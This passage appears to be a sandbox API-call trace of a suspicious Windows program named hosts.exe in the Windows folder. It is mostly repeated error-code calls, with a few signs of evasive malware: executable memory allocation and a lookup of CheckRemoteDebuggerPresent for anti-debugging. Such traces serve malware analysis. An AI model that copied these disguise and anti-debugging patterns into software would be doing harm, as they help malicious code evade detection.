0x0 [0172.819] SetLastError (dwErrCode=0x0) [0172.819] GetLastError () returned 0x0 [0172.819] SetLastError (dwErrCode=0x0) [0172.819] GetLastError () returned 0x0 [0172.819] SetLastError (dwErrCode=0x0) [0172.819] GetLastError () returned 0x0 [0172.819] SetLastError (dwErrCode=0x0) [0172.819] GetLastError () returned 0x0 [0172.820] SetLastError (dwErrCode=0x0) [0172.820] GetLastError () returned 0x0 [0172.820] SetLastError (dwErrCode=0x0) [0172.820] GetLastError () returned 0x0 [0172.820] SetLastError (dwErrCode=0x0) [0172.820] GetLastError () returned 0x0 [0172.821] SetLastError (dwErrCode=0x0) [0172.821] GetLastError () returned 0x0 [0172.821] SetLastError (dwErrCode=0x0) [0172.821] GetLastError () returned 0x0 [0172.821] SetLastError (dwErrCode=0x0) [0172.824] GetLastError () returned 0x0 [0172.824] SetLastError (dwErrCode=0x0) [0172.824] GetLastError () returned 0x0 [0172.824] SetLastError (dwErrCode=0x0) [0172.824] GetLastError () returned 0x0 [0172.824] SetLastError (dwErrCode=0x0) [0172.825] GetLastError () returned 0x0 [0172.825] SetLastError (dwErrCode=0x0) [0172.825] GetLastError () returned 0x0 [0172.825] SetLastError (dwErrCode=0x0) [0172.825] GetLastError () returned 0x0 [0172.826] SetLastError (dwErrCode=0x0) [0172.826] GetLastError () returned 0x0 [0172.826] SetLastError (dwErrCode=0x0) [0172.826] GetLastError () returned 0x0 [0172.826] SetLastError (dwErrCode=0x0) [0172.826] GetLastError () returned 0x0 [0172.827] SetLastError (dwErrCode=0x0) [0172.827] GetLastError () returned 0x0 [0172.827] SetLastError (dwErrCode=0x0) [0172.827] GetLastError () returned 0x0 [0172.828] SetLastError (dwErrCode=0x0) [0172.828] GetLastError () returned 0x0 [0172.828] SetLastError (dwErrCode=0x0) [0172.828] GetLastError () returned 0x0 [0172.828] SetLastError (dwErrCode=0x0) [0172.828] GetLastError () returned 0x0 [0172.829] SetLastError (dwErrCode=0x0) [0172.829] GetLastError () returned 0x0 [0172.829] SetLastError (dwErrCode=0x0) [0172.829] GetLastError () returned 0x0 [0172.829] SetLastError (dwErrCode=0x0) [0172.830] VirtualAlloc (lpAddress=0x3424000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x3424000 [0172.932] VirtualFree (lpAddress=0x3424000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0172.933] GetLastError () returned 0x0 [0172.933] SetLastError (dwErrCode=0x0) [0172.933] GetLastError () returned 0x0 [0172.934] SetLastError (dwErrCode=0x0) [0172.934] GetLastError () returned 0x0 [0172.934] SetLastError (dwErrCode=0x0) [0172.934] GetLastError () returned 0x0 [0172.934] SetLastError (dwErrCode=0x0) [0172.934] GetLastError () returned 0x0 [0172.935] SetLastError (dwErrCode=0x0) [0172.935] GetLastError () returned 0x0 [0172.935] SetLastError (dwErrCode=0x0) [0172.935] GetLastError () returned 0x0 [0172.935] SetLastError (dwErrCode=0x0) [0172.935] GetLastError () returned 0x0 [0172.936] SetLastError (dwErrCode=0x0) [0172.936] GetLastError () returned 0x0 [0172.936] SetLastError (dwErrCode=0x0) [0172.937] GetLastError () returned 0x0 [0172.937] SetLastError (dwErrCode=0x0) [0172.937] GetLastError () returned 0x0 [0172.937] SetLastError (dwErrCode=0x0) [0172.937] GetLastError () returned 0x0 [0172.938] SetLastError (dwErrCode=0x0) [0172.938] GetLastError () returned 0x0 [0172.938] SetLastError (dwErrCode=0x0) [0172.938] GetLastError () returned 0x0 [0172.939] SetLastError (dwErrCode=0x0) [0172.939] GetLastError () returned 0x0 [0172.939] SetLastError (dwErrCode=0x0) [0172.939] GetLastError () returned 0x0 [0172.939] SetLastError (dwErrCode=0x0) [0172.939] GetLastError () returned 0x0 [0172.940] SetLastError (dwErrCode=0x0) [0172.940] GetLastError () returned 0x0 [0172.940] SetLastError (dwErrCode=0x0) [0172.940] GetLastError () returned 0x0 [0172.941] SetLastError (dwErrCode=0x0) [0172.941] GetLastError () returned 0x0 [0172.941] SetLastError (dwErrCode=0x0) [0172.941] GetLastError () returned 0x0 [0172.942] SetLastError (dwErrCode=0x0) [0172.942] GetLastError () returned 0x0 [0172.942] SetLastError (dwErrCode=0x0) [0172.942] GetLastError () returned 0x0 [0172.943] SetLastError (dwErrCode=0x0) [0172.943] GetLastError () returned 0x0 [0172.943] SetLastError (dwErrCode=0x0) [0172.943] GetLastError () returned 0x0 [0172.943] SetLastError (dwErrCode=0x0) [0172.943] GetLastError () returned 0x0 [0172.944] SetLastError (dwErrCode=0x0) [0172.944] GetLastError () returned 0x0 [0172.944] SetLastError (dwErrCode=0x0) [0172.944] GetLastError () returned 0x0 [0172.945] SetLastError (dwErrCode=0x0) [0172.945] GetLastError () returned 0x0 [0172.945] SetLastError (dwErrCode=0x0) [0172.945] GetLastError () returned 0x0 [0172.945] SetLastError (dwErrCode=0x0) [0172.945] GetLastError () returned 0x0 [0172.946] SetLastError (dwErrCode=0x0) [0172.946] GetLastError () returned 0x0 [0172.946] SetLastError (dwErrCode=0x0) [0172.946] GetLastError () returned 0x0 [0172.947] SetLastError (dwErrCode=0x0) [0172.947] GetLastError () returned 0x0 [0172.947] SetLastError (dwErrCode=0x0) [0172.947] GetLastError () returned 0x0 [0172.948] SetLastError (dwErrCode=0x0) [0172.948] GetLastError () returned 0x0 [0172.948] SetLastError (dwErrCode=0x0) [0172.948] GetLastError () returned 0x0 [0172.949] SetLastError (dwErrCode=0x0) [0172.949] GetLastError () returned 0x0 [0172.949] SetLastError (dwErrCode=0x0) [0172.949] GetLastError () returned 0x0 [0172.949] SetLastError (dwErrCode=0x0) [0172.960] GetLastError () returned 0x0 [0172.960] SetLastError (dwErrCode=0x0) [0172.960] GetLastError () returned 0x0 [0172.960] SetLastError (dwErrCode=0x0) [0172.960] GetLastError () returned 0x0 [0172.961] SetLastError (dwErrCode=0x0) [0172.961] GetLastError () returned 0x0 [0172.961] SetLastError (dwErrCode=0x0) [0172.961] GetLastError () returned 0x0 [0172.961] SetLastError (dwErrCode=0x0) [0172.962] GetLastError () returned 0x0 [0172.962] SetLastError (dwErrCode=0x0) [0172.962] GetLastError () returned 0x0 [0172.962] SetLastError (dwErrCode=0x0) [0172.962] GetLastError () returned 0x0 [0172.963] SetLastError (dwErrCode=0x0) [0172.963] GetCurrentThreadId () returned 0xa9c [0172.963] GetLastError () returned 0x0 [0172.963] SetLastError (dwErrCode=0x0) [0172.963] GetLastError () returned 0x0 [0172.964] SetLastError (dwErrCode=0x0) [0172.964] GetLastError () returned 0x0 [0172.964] SetLastError (dwErrCode=0x0) [0172.964] GetLastError () returned 0x0 [0172.964] SetLastError (dwErrCode=0x0) [0172.965] GetLastError () returned 0x0 [0172.965] SetLastError (dwErrCode=0x0) [0172.965] GetCurrentThreadId () returned 0xa9c [0172.965] GetLastError () returned 0x0 [0172.965] SetLastError (dwErrCode=0x0) [0172.965] GetLastError () returned 0x0 [0172.966] SetLastError (dwErrCode=0x0) [0172.966] GetLastError () returned 0x0 [0172.966] SetLastError (dwErrCode=0x0) [0172.966] GetCurrentThreadId () returned 0xa9c [0172.966] GetLastError () returned 0x0 [0172.967] SetLastError (dwErrCode=0x0) [0172.967] GetLastError () returned 0x0 [0172.967] SetLastError (dwErrCode=0x0) [0172.967] GetLastError () returned 0x0 [0172.968] SetLastError (dwErrCode=0x0) [0172.968] GetLastError () returned 0x0 [0172.968] SetLastError (dwErrCode=0x0) [0172.968] GetLastError () returned 0x0 [0172.969] SetLastError (dwErrCode=0x0) [0172.969] GetLastError () returned 0x0 [0172.969] SetLastError (dwErrCode=0x0) [0172.969] GetCurrentThreadId () returned 0xa9c [0172.969] GetLastError () returned 0x0 [0172.970] SetLastError (dwErrCode=0x0) [0172.970] GetLastError () returned 0x0 [0172.970] SetLastError (dwErrCode=0x0) [0172.970] GetLastError () returned 0x0 [0172.971] SetLastError (dwErrCode=0x0) [0172.971] GetCurrentThreadId () returned 0xa9c [0172.971] GetLastError () returned 0x0 [0172.971] SetLastError (dwErrCode=0x0) [0172.971] GetLastError () returned 0x0 [0172.972] SetLastError (dwErrCode=0x0) [0172.972] GetLastError () returned 0x0 [0172.972] SetLastError (dwErrCode=0x0) [0172.972] GetCurrentThreadId () returned 0xa9c [0172.972] GetLastError () returned 0x0 [0173.023] SetLastError (dwErrCode=0x0) [0173.023] GetLastError () returned 0x0 [0173.024] SetLastError (dwErrCode=0x0) [0173.024] GetLastError () returned 0x0 [0173.024] SetLastError (dwErrCode=0x0) [0173.024] GetCurrentThreadId () returned 0xa9c [0173.024] GetLastError () returned 0x0 [0173.025] SetLastError (dwErrCode=0x0) [0173.025] GetLastError () returned 0x0 [0173.025] SetLastError (dwErrCode=0x0) [0173.025] GetLastError () returned 0x0 [0173.025] SetLastError (dwErrCode=0x0) [0173.026] GetCurrentThreadId () returned 0xa9c [0173.026] GetLastError () returned 0x0 [0173.026] SetLastError (dwErrCode=0x0) [0173.026] GetLastError () returned 0x0 [0173.026] SetLastError (dwErrCode=0x0) [0173.027] GetLastError () returned 0x0 [0173.027] SetLastError (dwErrCode=0x0) [0173.027] GetCurrentThreadId () returned 0xa9c [0173.027] GetLastError () returned 0x0 [0173.027] SetLastError (dwErrCode=0x0) [0173.028] GetLastError () returned 0x0 [0173.028] SetLastError (dwErrCode=0x0) [0173.028] GetLastError () returned 0x0 [0173.028] SetLastError (dwErrCode=0x0) [0173.028] GetLastError () returned 0x0 [0173.029] SetLastError (dwErrCode=0x0) [0173.029] GetLastError () returned 0x0 [0173.029] SetLastError (dwErrCode=0x0) [0173.029] GetLastError () returned 0x0 [0173.030] SetLastError (dwErrCode=0x0) [0173.030] GetLastError () returned 0x0 [0173.030] SetLastError (dwErrCode=0x0) [0173.030] GetLastError () returned 0x0 [0173.031] SetLastError (dwErrCode=0x0) [0173.031] GetLastError () returned 0x0 [0173.031] SetLastError (dwErrCode=0x0) [0173.031] GetLastError () returned 0x0 [0173.031] SetLastError (dwErrCode=0x0) [0173.032] GetLastError () returned 0x0 [0173.032] SetLastError (dwErrCode=0x0) [0173.032] GetLastError () returned 0x0 [0173.032] SetLastError (dwErrCode=0x0) [0173.033] GetLastError () returned 0x0 [0173.033] SetLastError (dwErrCode=0x0) [0173.033] GetLastError () returned 0x0 [0173.033] SetLastError (dwErrCode=0x0) [0173.033] GetLastError () returned 0x0 [0173.034] SetLastError (dwErrCode=0x0) [0173.034] GetLastError () returned 0x0 [0173.034] SetLastError (dwErrCode=0x0) [0173.034] GetLastError () returned 0x0 [0173.035] SetLastError (dwErrCode=0x0) [0173.035] GetLastError () returned 0x0 [0173.035] SetLastError (dwErrCode=0x0) [0173.035] GetLastError () returned 0x0 [0173.036] SetLastError (dwErrCode=0x0) [0173.036] GetLastError () returned 0x0 [0173.036] SetLastError (dwErrCode=0x0) [0173.036] GetLastError () returned 0x0 [0173.037] SetLastError (dwErrCode=0x0) [0173.037] GetLastError () returned 0x0 [0173.037] SetLastError (dwErrCode=0x0) [0173.037] GetLastError () returned 0x0 [0173.038] SetLastError (dwErrCode=0x0) [0173.038] GetLastError () returned 0x0 [0173.038] SetLastError (dwErrCode=0x0) [0173.038] GetLastError () returned 0x0 [0173.038] SetLastError (dwErrCode=0x0) [0173.038] GetLastError () returned 0x0 [0173.039] SetLastError (dwErrCode=0x0) [0173.039] GetLastError () returned 0x0 [0173.039] SetLastError (dwErrCode=0x0) [0173.039] GetLastError () returned 0x0 [0173.040] SetLastError (dwErrCode=0x0) [0173.040] GetLastError () returned 0x0 [0173.040] SetLastError (dwErrCode=0x0) [0173.040] GetLastError () returned 0x0 [0173.041] SetLastError (dwErrCode=0x0) [0173.041] GetLastError () returned 0x0 [0173.041] SetLastError (dwErrCode=0x0) [0173.041] GetLastError () returned 0x0 [0173.041] SetLastError (dwErrCode=0x0) [0173.041] GetLastError () returned 0x0 [0173.042] SetLastError (dwErrCode=0x0) [0173.042] GetLastError () returned 0x0 [0173.042] SetLastError (dwErrCode=0x0) [0173.042] GetLastError () returned 0x0 [0173.043] SetLastError (dwErrCode=0x0) [0173.043] GetLastError () returned 0x0 [0173.043] SetLastError (dwErrCode=0x0) [0173.043] GetLastError () returned 0x0 [0173.044] SetLastError (dwErrCode=0x0) [0173.044] GetLastError () returned 0x0 [0173.044] SetLastError (dwErrCode=0x0) [0173.044] GetLastError () returned 0x0 [0173.044] SetLastError (dwErrCode=0x0) [0173.045] GetLastError () returned 0x0 [0173.045] SetLastError (dwErrCode=0x0) [0173.045] GetLastError () returned 0x0 [0173.045] SetLastError (dwErrCode=0x0) [0173.045] GetLastError () returned 0x0 [0173.046] SetLastError (dwErrCode=0x0) [0173.046] GetLastError () returned 0x0 [0173.046] SetLastError (dwErrCode=0x0) [0173.046] GetLastError () returned 0x0 [0173.047] SetLastError (dwErrCode=0x0) [0173.047] GetLastError () returned 0x0 [0173.047] SetLastError (dwErrCode=0x0) [0173.047] GetLastError () returned 0x0 [0173.047] SetLastError (dwErrCode=0x0) [0173.047] GetLastError () returned 0x0 [0173.048] SetLastError (dwErrCode=0x0) [0173.048] GetLastError () returned 0x0 [0173.048] SetLastError (dwErrCode=0x0) [0173.048] GetLastError () returned 0x0 [0173.048] SetLastError (dwErrCode=0x0) [0173.049] GetLastError () returned 0x0 [0173.049] SetLastError (dwErrCode=0x0) [0173.049] GetLastError () returned 0x0 [0173.049] SetLastError (dwErrCode=0x0) [0173.049] GetLastError () returned 0x0 [0173.050] SetLastError (dwErrCode=0x0) [0173.050] GetLastError () returned 0x0 [0173.050] SetLastError (dwErrCode=0x0) [0173.050] VirtualFree (lpAddress=0x3414000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0173.052] GetLastError () returned 0x0 [0173.052] SetLastError (dwErrCode=0x0) [0173.052] GetLastError () returned 0x0 [0173.052] SetLastError (dwErrCode=0x0) [0173.052] GetLastError () returned 0x0 [0173.053] SetLastError (dwErrCode=0x0) [0173.053] GetLastError () returned 0x0 [0173.053] SetLastError (dwErrCode=0x0) [0173.053] GetLastError () returned 0x0 [0173.053] SetLastError (dwErrCode=0x0) [0173.054] GetLastError () returned 0x0 [0173.054] SetLastError (dwErrCode=0x0) [0173.054] GetLastError () returned 0x0 [0173.054] SetLastError (dwErrCode=0x0) [0173.054] GetLastError () returned 0x0 [0173.055] SetLastError (dwErrCode=0x0) [0173.055] GetLastError () returned 0x0 [0173.055] SetLastError (dwErrCode=0x0) [0173.055] GetLastError () returned 0x0 [0173.056] SetLastError (dwErrCode=0x0) [0173.056] GetLastError () returned 0x0 [0173.056] SetLastError (dwErrCode=0x0) [0173.056] GetLastError () returned 0x0 [0173.056] SetLastError (dwErrCode=0x0) [0173.056] GetLastError () returned 0x0 [0173.057] SetLastError (dwErrCode=0x0) [0173.057] GetLastError () returned 0x0 [0173.057] SetLastError (dwErrCode=0x0) [0173.058] GetLastError () returned 0x0 [0173.058] SetLastError (dwErrCode=0x0) [0173.058] GetLastError () returned 0x0 [0173.058] SetLastError (dwErrCode=0x0) [0173.058] GetLastError () returned 0x0 [0173.059] SetLastError (dwErrCode=0x0) [0173.059] GetLastError () returned 0x0 [0173.059] SetLastError (dwErrCode=0x0) [0173.059] GetLastError () returned 0x0 [0173.060] SetLastError (dwErrCode=0x0) [0173.060] GetLastError () returned 0x0 [0173.060] SetLastError (dwErrCode=0x0) [0173.060] GetLastError () returned 0x0 [0173.060] SetLastError (dwErrCode=0x0) [0173.061] GetLastError () returned 0x0 [0173.061] SetLastError (dwErrCode=0x0) [0173.061] GetLastError () returned 0x0 [0173.061] SetLastError (dwErrCode=0x0) [0173.061] GetLastError () returned 0x0 [0173.062] SetLastError (dwErrCode=0x0) [0173.062] GetLastError () returned 0x0 [0173.062] SetLastError (dwErrCode=0x0) [0173.062] GetLastError () returned 0x0 [0173.062] SetLastError (dwErrCode=0x0) [0173.063] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0173.063] GetLastError () returned 0x0 [0173.063] SetLastError (dwErrCode=0x0) [0173.063] GetLastError () returned 0x0 [0173.063] SetLastError (dwErrCode=0x0) [0173.063] GetLastError () returned 0x0 [0173.064] SetLastError (dwErrCode=0x0) [0173.064] GetProcAddress (hModule=0x75a80000, lpProcName="CheckRemoteDebuggerPresent") returned 0x75abb0de [0173.064] GetLastError () returned 0x0 [0173.064] SetLastError (dwErrCode=0x0) [0173.064] GetLastError () returned 0x0 [0173.065] SetLastError (dwErrCode=0x0) [0173.065] GetLastError () returned 0x0 [0173.065] SetLastError (dwErrCode=0x0) [0173.065] GetLocalTime (in: lpSystemTime=0x28fe6c | out: lpSystemTime=0x28fe6c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x8, wMilliseconds=0x382)) [0173.065] GetLastError () returned 0x0 [0173.066] SetLastError (dwErrCode=0x0) [0173.066] GetLastError () returned 0x0 [0173.066] SetLastError (dwErrCode=0x0) [0173.066] GetCurrentThreadId () returned 0xa9c [0173.157] GetLastError () returned 0x0 [0173.158] SetLastError (dwErrCode=0x0) [0173.158] GetLastError () returned 0x0 [0173.158] SetLastError (dwErrCode=0x0) [0173.158] GetLastError () returned 0x0 [0173.158] SetLastError (dwErrCode=0x0) [0173.158] GetLastError () returned 0x0 [0173.158] SetLastError (dwErrCode=0x0) [0173.159] GetLastError () returned 0x0 [0173.159] SetLastError (dwErrCode=0x0) [0173.159] GetCurrentThreadId () returned 0xa9c [0173.159] GetLastError () returned 0x0 [0173.159] SetLastError (dwErrCode=0x0) [0173.159] GetLastError () returned 0x0 [0173.159] SetLastError (dwErrCode=0x0) [0173.159] GetLastError () returned 0x0 [0173.160] SetLastError (dwErrCode=0x0) [0173.160] GetLastError () returned 0x0 [0173.164] SetLastError (dwErrCode=0x0) [0173.165] GetTimeZoneInformation (in: lpTimeZoneInformation=0x28fdbc | out: lpTimeZoneInformation=0x28fdbc) returned 0x2 [0173.172] GetLastError () returned 0x0 [0173.173] SetLastError (dwErrCode=0x0) [0173.173] GetLastError () returned 0x0 [0173.174] SetLastError (dwErrCode=0x0) [0173.174] GetCurrentThreadId () returned 0xa9c [0173.174] GetLastError () returned 0x0 [0173.174] SetLastError (dwErrCode=0x0) [0173.178] GetLastError () returned 0x0 [0173.178] SetLastError (dwErrCode=0x0) [0173.179] GetLastError () returned 0x0 [0173.179] SetLastError (dwErrCode=0x0) [0173.179] GetCurrentThreadId () returned 0xa9c [0173.179] GetLastError () returned 0x0 [0173.179] SetLastError (dwErrCode=0x0) [0173.179] GetLastError () returned 0x0 [0173.179] SetLastError (dwErrCode=0x0) [0173.179] GetLastError () returned 0x0 [0173.180] SetLastError (dwErrCode=0x0) [0173.180] GetLastError () returned 0x0 [0173.180] SetLastError (dwErrCode=0x0) [0173.180] GetLocalTime (in: lpSystemTime=0x28fe6c | out: lpSystemTime=0x28fe6c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x9, wMilliseconds=0x16)) [0173.180] GetLastError () returned 0x0 [0173.180] SetLastError (dwErrCode=0x0) [0173.180] GetLastError () returned 0x0 [0173.181] SetLastError (dwErrCode=0x0) [0173.181] GetCurrentThreadId () returned 0xa9c [0173.181] GetLastError () returned 0x0 [0173.181] SetLastError (dwErrCode=0x0) [0173.181] GetLastError () returned 0x0 [0173.181] SetLastError (dwErrCode=0x0) [0173.181] GetLastError () returned 0x0 [0173.182] SetLastError (dwErrCode=0x0) [0173.182] GetLastError () returned 0x0 [0173.182] SetLastError (dwErrCode=0x0) [0173.182] GetCurrentThreadId () returned 0xa9c [0173.182] GetLastError () returned 0x0 [0173.182] SetLastError (dwErrCode=0x0) [0173.182] GetLastError () returned 0x0 [0173.183] SetLastError (dwErrCode=0x0) [0173.183] GetLastError () returned 0x0 [0173.183] SetLastError (dwErrCode=0x0) [0173.183] GetLastError () returned 0x0 [0173.183] SetLastError (dwErrCode=0x0) [0173.183] GetTimeZoneInformation (in: lpTimeZoneInformation=0x28fdbc | out: lpTimeZoneInformation=0x28fdbc) returned 0x2 [0173.183] GetLastError () returned 0x0 [0173.184] SetLastError (dwErrCode=0x0) [0173.184] GetLastError () returned 0x0 [0173.184] SetLastError (dwErrCode=0x0) [0173.184] GetCurrentThreadId () returned 0xa9c [0173.184] GetLastError () returned 0x0 [0173.184] SetLastError (dwErrCode=0x0) [0173.184] GetLastError () returned 0x0 [0173.185] SetLastError (dwErrCode=0x0) [0173.185] GetLastError () returned 0x0 [0173.190] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0173.191] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0173.195] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0173.196] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0173.197] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0173.197] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0173.198] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0173.198] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0173.199] GetLastError () returned 0x0 [0173.199] SetLastError (dwErrCode=0x0) [0173.199] GetLastError () returned 0x0 [0173.199] SetLastError (dwErrCode=0x0) [0173.199] GetLastError () returned 0x0 [0173.200] SetLastError (dwErrCode=0x0) [0173.200] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x10eba04, nSize=0x104 | out: lpFilename="C:\\windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe")) returned 0x14 [0173.200] CharLowerBuffW (in: lpsz="C:\\windows\\hosts.exe", cchLength=0x14 | out: lpsz="c:\\windows\\hosts.exe") returned 0x14 [0173.201] GetFullPathNameW (in: lpFileName="C:\\windows\\hosts.exe", nBufferLength=0x104, lpBuffer=0x28f9cc, lpFilePart=0x28f9c8 | out: lpBuffer="C:\\windows\\hosts.exe", lpFilePart=0x28f9c8*="hosts.exe") returned 0x14 [0173.201] FindFirstFileW (in: lpFileName="C:\\windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe"), lpFindFileData=0x28fc28 | out: lpFindFileData=0x28fc28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9061f60, ftCreationTime.dwHighDateTime=0x1da9884, ftLastAccessTime.dwLowDateTime=0xf9061f60, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xfa5ce560, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x1442557, dwReserved0=0x557580, dwReserved1=0x0, cFileName="hosts.exe", cAlternateFileName="")) returned 0x10ee630 [0173.201] FileTimeToLocalFileTime (in: lpFileTime=0x28fc3c, lpLocalFileTime=0x28fbc0 | out: lpLocalFileTime=0x28fbc0) returned 1 [0173.201] FileTimeToDosDateTime (in: lpFileTime=0x28fbc0, lpFatDate=0x28fc0a, lpFatTime=0x28fc08 | out: lpFatDate=0x28fc0a, lpFatTime=0x28fc08) returned 1 [0173.202] SysReAllocStringLen (in: pbstr=0x28fc00*=0x0, psz="C:\\windows\\", len=0xb | out: pbstr=0x28fc00*="C:\\windows\\") returned 1 [0173.202] SysReAllocStringLen (in: pbstr=0x28fbf8*=0x0, psz="C:\\windows\\hosts.exe", len=0x14 | out: pbstr=0x28fbf8*="C:\\windows\\hosts.exe") returned 1 [0173.202] CharLowerBuffW (in: lpsz="C:\\windows\\hosts.exe", cchLength=0x14 | out: lpsz="c:\\windows\\hosts.exe") returned 0x14 [0173.202] SysReAllocStringLen (in: pbstr=0x28ff10*="C:\\windows\\hosts.exe", psz="c:\\windows\\hosts.exe", len=0x14 | out: pbstr=0x28ff10*="c:\\windows\\hosts.exe") returned 1 [0173.202] GetLastError () returned 0x0 [0173.202] SetLastError (dwErrCode=0x0) [0173.202] GetLastError () returned 0x0 [0173.203] SetLastError (dwErrCode=0x0) [0173.203] GetLastError () returned 0x0 [0173.203] SetLastError (dwErrCode=0x0) [0173.203] SysReAllocStringLen (in: pbstr=0x557578*=0x0, psz="c:\\windows\\hosts.exe", len=0x14 | out: pbstr=0x557578*="c:\\windows\\hosts.exe") returned 1 [0173.203] GetLastError () returned 0x0 [0173.203] SetLastError (dwErrCode=0x0) [0173.203] GetLastError () returned 0x0 [0173.204] SetLastError (dwErrCode=0x0) [0173.204] GetLastError () returned 0x0 [0173.204] SetLastError (dwErrCode=0x0) [0173.204] SysReAllocStringLen (in: pbstr=0x342004c*=0x0, psz="c:\\windows\\hosts.exe", len=0x14 | out: pbstr=0x342004c*="c:\\windows\\hosts.exe") returned 1 [0173.204] SysReAllocStringLen (in: pbstr=0x3420060*=0x0, psz="c:\\windows\\", len=0xb | out: pbstr=0x3420060*="c:\\windows\\") returned 1 [0173.205] SysReAllocStringLen (in: pbstr=0x28fe60*=0x0, psz="c:\\windows\\", len=0xb | out: pbstr=0x28fe60*="c:\\windows\\") returned 1 [0173.205] CharLowerBuffW (in: lpsz="c:\\windows\\", cchLength=0xb | out: lpsz="c:\\windows\\") returned 0xb [0173.205] SysReAllocStringLen (in: pbstr=0x342009c*=0x0, psz="c:\\windows\\", len=0xb | out: pbstr=0x342009c*="c:\\windows\\") returned 1 [0173.206] SysReAllocStringLen (in: pbstr=0x34200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x34200a0*="c:") returned 1 [0173.206] SysReAllocStringLen (in: pbstr=0x33e0834*=0x0, psz="windows", len=0x7 | out: pbstr=0x33e0834*="windows") returned 1 [0173.207] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0173.307] SysReAllocStringLen (in: pbstr=0x28fe64*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe64*="c:\\") returned 1 [0173.307] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="windows", len=0x7 | out: pbstr=0x28fae8*="windows") returned 1 [0173.308] FindFirstFileW (in: lpFileName="c:\\windows" (normalized: "c:\\windows"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf9061f60, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf9061f60, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x10ea788 [0173.308] FindNextFileW (in: hFindFile=0x10ea788, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf9061f60, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf9061f60, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0173.309] GetLastError () returned 0x12 [0173.309] FindClose (in: hFindFile=0x10ea788 | out: hFindFile=0x10ea788) returned 1 [0173.309] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Windows", len=0xa | out: pbstr=0x28fadc*="c:\\Windows") returned 1 [0173.309] SysReAllocStringLen (in: pbstr=0x28fe64*="c:\\Windows", psz="c:\\Windows\\", len=0xb | out: pbstr=0x28fe64*="c:\\Windows\\") returned 1 [0173.310] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Windows\\", len=0xb | out: pbstr=0x28fad8*="c:\\Windows\\") returned 1 [0173.310] SysReAllocStringLen (in: pbstr=0x28fe64*="c:\\Windows\\", psz="c:\\Windows", len=0xa | out: pbstr=0x28fe64*="c:\\Windows") returned 1 [0173.311] SysReAllocStringLen (in: pbstr=0x28fe68*=0x0, psz="c:\\Windows", len=0xa | out: pbstr=0x28fe68*="c:\\Windows") returned 1 [0173.311] SysReAllocStringLen (in: pbstr=0x3420060*="c:\\windows\\", psz="c:\\Windows\\", len=0xb | out: pbstr=0x3420060*="c:\\Windows\\") returned 1 [0173.311] VirtualAlloc (lpAddress=0x3424000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x40) returned 0x3424000 [0173.314] GetSystemDirectoryW (in: lpBuffer=0x3423b40, uSize=0xfffe | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0173.315] CharLowerBuffW (in: lpsz="C:\\Windows\\system32", cchLength=0x13 | out: lpsz="c:\\windows\\system32") returned 0x13 [0173.315] SysReAllocStringLen (in: pbstr=0x3433b48*=0x0, psz="c:\\windows\\system32", len=0x13 | out: pbstr=0x3433b48*="c:\\windows\\system32") returned 1 [0173.315] SysReAllocStringLen (in: pbstr=0x3433b4c*=0x0, psz="c:", len=0x2 | out: pbstr=0x3433b4c*="c:") returned 1 [0173.320] SysReAllocStringLen (in: pbstr=0x33e0834*=0x0, 